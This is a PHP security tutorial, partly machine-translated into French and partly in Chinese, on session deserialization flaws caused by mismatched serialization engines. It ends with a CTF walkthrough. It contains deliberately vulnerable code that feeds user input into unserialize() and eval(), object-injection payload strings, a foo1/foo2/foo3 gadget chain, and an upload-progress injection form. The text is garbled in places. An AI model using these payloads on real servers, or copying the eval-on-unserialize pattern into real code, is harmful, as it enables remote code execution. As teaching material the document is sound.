Introduction
Il y a trois éléments de configuration dans php.ini :
session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php
Les options ci-dessus sont liées au stockage de session et au stockage de séquences en PHP.
Dans l'installation utilisant le composant xampp, les éléments de configuration ci-dessus sont définis comme suit :
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下 session.save_handler=files 表明session是以文件的方式来进行存储的 session.auto_start=0 表明默认不启动session session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
Dans la configuration ci-dessus, session.serialize_handler est utilisé pour définir le moteur de sérialisation de la session In. En plus du moteur PHP par défaut, il existe d'autres moteurs, et les sessions correspondant aux différents moteurs sont stockées de différentes manières.
php_binary : La méthode de stockage est que le nom de clé en caractères ASCII correspondant à la longueur du nom de clé est la valeur sérialisée par la fonction serialize()
php : La méthode de stockage est que la barre verticale du nom de clé est traitée par la séquence de fonctions serialize()
php_serialize(php>5.5.4) : La méthode de stockage est que la valeur est traitée par la séquence de fonctions serialize() La valeur traitée
est utilisée par défaut en PHP. Si vous souhaitez la changer vers un autre moteur, il vous suffit d'ajouter le. code ini_set('session.serialize_handler', 'Besoin de définir le moteur');. L'exemple de code est le suivant :
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); // do something
Mécanisme de stockage
Le contenu de la session en php n'est pas stocké en mémoire, mais est stocké sous forme de fichiers. est L'élément de configuration session.save_handler est utilisé pour déterminer la configuration, et la valeur par défaut est de la stocker dans un fichier.
Le fichier stocké est nommé d'après sess_sessionid, et le contenu du fichier est le contenu après la séquence de la valeur de session.
En supposant que notre environnement est xampp, la configuration par défaut est la même que ci-dessus.
Dans la configuration par défaut :
<?php session_start() $_SESSION['name'] = 'spoock'; var_dump(); ?>
La dernière session est stockée et affichée comme suit :
Vous pouvez voir le PHPSESSID La valeur est jo86ud4jfvu81mbg28sl2s56c2, et le nom du fichier stocké sous xampp/tmp est sess_jo86ud4jfvu81mbg28sl2s56c2, et le contenu du fichier est name|s:6:"spoock";. name est la valeur clé, s:6:"spoock"; est le résultat de serialize("spoock").
Sous le moteur php_serialize :
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
Le contenu du fichier SESSION est un:1:{s:4:"name";s:6:"spoock";}. a:1 sera ajouté si php_serialize est utilisé pour la sérialisation. Dans le même temps, l'utilisation de php_serialize sérialisera à la fois la clé et la valeur dans la session.
Sous le moteur php_binary :
<?php ini_set('session.serialize_handler', 'php_binary'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
Le contenu du fichier SESSION est names:6:"spoock";. Puisque la longueur du nom est 4, 4 correspond à EOT dans la table ASCII. Selon les règles de stockage de php_binary, le dernier est noms:6:"spoock";. (Soudain, j'ai découvert que les caractères avec une valeur ASCII de 4 ne peuvent pas être affichés sur la page Web. Veuillez vérifier vous-même le tableau ASCII)
La sérialisation est simple à utiliser
test.php
?php class syclover{ var $func=""; function __construct() { $this->func = "phpinfo()"; } function __wakeup(){ eval($this->func); } } unserialize($_GET['a']); ?>
Les paramètres entrants sont sérialisés sur la ligne 11. Nous pouvons transmettre une chaîne spécifique, la désérialiser dans un exemple de syclover, puis exécuter la méthode eval(). Nous visitons localhost/test.php?a=O:8:"syclover":1:{s:4:"func";s:14:"echo "spoock";";}. Ensuite, le contenu obtenu par désérialisation est :
object(syclover)[1] public 'func' => string 'echo "spoock";' (length=14)
La dernière page en sortie est spoock, indiquant que la méthode echo "spoock" que nous avons définie a finalement été exécutée.
Ceci est une démonstration d'une simple vulnérabilité de sérialisation
Risques de sérialisation dans PHP Session
Il n'y a aucun problème avec l'implémentation de Session en PHP, les principaux dangers sont causés par utilisation inappropriée de Session par les programmeurs.
Si le moteur utilisé par PHP pour désérialiser les données $_SESSION stockées est différent du moteur utilisé pour la sérialisation, les données ne seront pas désérialisées correctement. Grâce à des paquets de données soigneusement construits, il est possible de contourner la vérification du programme ou d'exécuter certaines méthodes système. Par exemple :
$_SESSION['ryat'] = '|O:11:"PeopleClass":0:{}';
Les données $_SESSION ci-dessus utilisent php_serialize, alors le contenu final stocké est a:1:{s:6:"spoock";s:24:"|O:11: " PeopleClass":0:{}";}.
Mais quand nous lisons, nous avons choisi php, donc le dernier contenu lu est :
array (size=1) 'a:1:{s:6:"spoock";s:24:"' => object(__PHP_Incomplete_Class)[1] public '__PHP_Incomplete_Class_Name' => string 'PeopleClass' (length=11)
C'est parce que lors de l'utilisation du moteur php, le moteur php utilisera comme séparateur entre | clé et valeur, alors a:1:{s:6:"spoock";s:24:" sera utilisé comme clé de SESSION, et O:11:"PeopleClass":0:{ } comme valeur, puis désérialisera , et enfin vous obtiendrez la classe PeopleClas.
Les différents moteurs utilisés pour la sérialisation et la désérialisation sont les raisons de la vulnérabilité de sérialisation de session PHP.
L'utilisation réelle de
<🎜. > existe s1.php et us2.php. Les moteurs SESSION utilisés par les deux fichiers sont différents, ce qui crée une vulnérabilité, s1 php, utilisez php_serialize pour traiter la session<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["spoock"]=$_GET["a"];
ini_set('session.serialize_handler', 'php'); session_start(); class lemon { var $hi; function __construct(){ $this->hi = 'phpinfo();'; } function __destruct() { eval($this->hi); } }
localhost/s1.php?a=|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
CTF
.在安恒杯中的一道题目就考察了这个知识点。题目中的关键代码如下:
class.php
<?php highlight_string(file_get_contents(basename($_SERVER['PHP_SELF']))); //show_source(__FILE__); class foo1{ public $varr; function __construct(){ $this->varr = "index.php"; } function __destruct(){ if(file_exists($this->varr)){ echo "<br>文件".$this->varr."存在<br>"; } echo "<br>这是foo1的析构函数<br>"; } } class foo2{ public $varr; public $obj; function __construct(){ $this->varr = '1234567890'; $this->obj = null; } function __toString(){ $this->obj->execute(); return $this->varr; } function __desctuct(){ echo "<br>这是foo2的析构函数<br>"; } } class foo3{ public $varr; function execute(){ eval($this->varr); } function __desctuct(){ echo "<br>这是foo3的析构函数<br>"; } } ?>
index.php
<?php ini_set('session.serialize_handler', 'php'); require("./class.php"); session_start(); $obj = new foo1(); $obj->varr = "phpinfo.php"; ?>
通过代码发现,我们最终是要通过foo3中的execute来执行我们自定义的函数。
那么我们首先在本地搭建环境,构造我们需要执行的自定义的函数。如下:
myindex.php
<?php class foo3{ public $varr='echo "spoock";'; function execute(){ eval($this->varr); } } class foo2{ public $varr; public $obj; function __construct(){ $this->varr = '1234567890'; $this->obj = new foo3(); } function __toString(){ $this->obj->execute(); return $this->varr; } } class foo1{ public $varr; function __construct(){ $this->varr = new foo2(); } } $obj = new foo1(); print_r(serialize($obj)); ?>
在foo1中的构造函数中定义$varr的值为foo2的实例,在foo2中定义$obj为foo3的实例,在foo3中定义$varr的值为echo "spoock"。最终得到的序列话的值是
O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:14:"echo "spoock";";}}}
这样当上面的序列话的值写入到服务器端,然后再访问服务器的index.php,最终就会执行我们预先定义的echo "spoock";的方法了。
写入的方式主要是利用PHP中Session Upload Progress来进行设置,具体为,在上传文件时,如果POST一个名为PHP_SESSION_UPLOAD_PROGRESS的变量,就可以将filename的值赋值到session中,上传的页面的写法如下:
<form action="index.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /> </form>
最后就会将文件名写入到session中,具体的实现细节可以参考PHP手册。
那么最终写入的文件名是|O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:1:"1";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:12:"var_dump(1);";}}}。注意与本地反序列化不一样的地方是要在最前方加上|
但是我在进行本地测试的时候,发现无法实现安恒这道题目所实现的效果,但是最终的原理是一样的。
总结
通过对PHP中的SESSION的分析,对PHP中的SESSION的实现原理有了更加深刻的认识。这个PHP的SESSION问题也是一个很好的问题。上述的这篇文章不仅使大家PHP中的SESSION的序列化漏洞有一个认识,也有助于程序员加强在PHP中的SESSION机制的理解。
以上就是PHP 中 Session 反序列化机制的内容,更多相关内容请关注PHP中文网(www.php.cn)!